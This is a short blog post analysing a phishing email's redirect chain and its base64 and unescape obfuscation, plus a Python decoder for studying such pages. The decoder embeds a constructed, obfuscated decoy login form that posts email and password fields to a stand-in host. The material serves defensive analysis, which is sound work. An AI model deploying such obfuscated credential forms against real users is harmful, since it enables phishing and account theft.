Sample Malware

Today I received a sample email that some of my coworkers caught. They asked me to look into it. The email link led to a bit.ly link, which I was able to extract, and through a clever little trick (appending a + character to a bit.ly link doesn’t load the site the link goes to, but instead tells you about the link) I learned that this link has been clicked on about 7000 times. Already I know we’re dealing with malware, so now it’s not a question of if it’s a rabbit hole, but rather, how deep does it go?

I pulled the bit.ly link contents out and handed it to curl on the terminal in my MacBook Pro. I don’t expect curl to do anything but show me the text of where this bit.ly link goes. It heads to a PHP file on a presumably hacked web server or blog. The PHP itself is an HTTP refresh-redirect to a Dropbox-hosted file. So I opened up my Virus Lab VM and followed where this led. The Dropbox content said it was a 1MB PDF file, but when I opened that, it led to a phishing attempt.

The phishing hack had an obnoxious URL attached to it, so I pulled that out and discovered it was encoded in base64 format. I decoded that text chunk online, and it revealed a JavaScript script block formed by a single call to the document.write(unescape()) function.
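The two layers described above (base64 wrapping, then a document.write(unescape()) call that URL-decodes the real HTML at page load) can be peeled apart statically, without ever running the script. The following is an added example, not the author's code or the original payload: the sample is a constructed base64 blob hiding a decoy credential form that posts to the reserved, non-resolving domain example.invalid.

```python
import base64
import re
import urllib.parse

# Constructed sample (not the real payload): a script block that writes a
# decoy login form via document.write(unescape(...)), then base64-wrapped,
# mirroring the layering seen in the phishing page.
INNER_HTML = ('<form action="https://example.invalid/collect" method="post">'
              '<input name="email"><input name="password" type="password"></form>')
SCRIPT = 'document.write(unescape("%s"))' % urllib.parse.quote(INNER_HTML, safe="")
SAMPLE_B64 = base64.b64encode(SCRIPT.encode()).decode()

WRITE_UNESCAPE = re.compile(
    r'document\.write\s*\(\s*unescape\s*\(\s*([\'"])(.*?)\1\s*\)\s*\)', re.S)


def decode_layer(b64_text: str) -> str:
    """Layer 1: undo the base64 wrapping carried in the URL."""
    return base64.b64decode(b64_text, validate=True).decode("utf-8", "replace")


def js_unescape(s: str) -> str:
    """Layer 2: static equivalent of JavaScript unescape(): %uXXXX then %XX."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def reveal(b64_text: str) -> dict:
    """Peel both layers without executing anything and summarise what was hidden."""
    script = decode_layer(b64_text)
    m = WRITE_UNESCAPE.search(script)
    if not m:
        return {"obfuscated": False, "html": script, "urls": [], "credential_form": False}
    html = js_unescape(m.group(2))
    urls = re.findall(r'https?://[^\s"\'<>]+', html)
    # A form that posts somewhere and carries a password field is the phishing tell.
    cred = (re.search(r'<form[^>]*action=', html, re.I) is not None
            and re.search(r'type=["\']?password', html, re.I) is not None)
    return {"obfuscated": True, "html": html, "urls": urls, "credential_form": cred}


if __name__ == "__main__":
    r = reveal(SAMPLE_B64)
    print("obfuscated:", r["obfuscated"])
    print("posts credentials to:", r["urls"])
    print("credential form:", r["credential_form"])
```

The `urls` list is what you would feed to your blocklist or takedown report; nothing here contacts the extracted hosts.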

Whoever it was went to great lengths to obfuscate their malware. Ultimately it led nowhere because we caught it. I find this sort of thing fascinating to pull apart, like an easy little puzzle to unravel. The phishing attempt is for an email username and password, and if someone falls for that, then, thanks to people usually being lazy with passwords, once you have one password, chances are you have all of them on every other site.

Just another reason to use a password manager and have an individual password per site. If one is breached, then the damage is limited to that one site, not all of them.
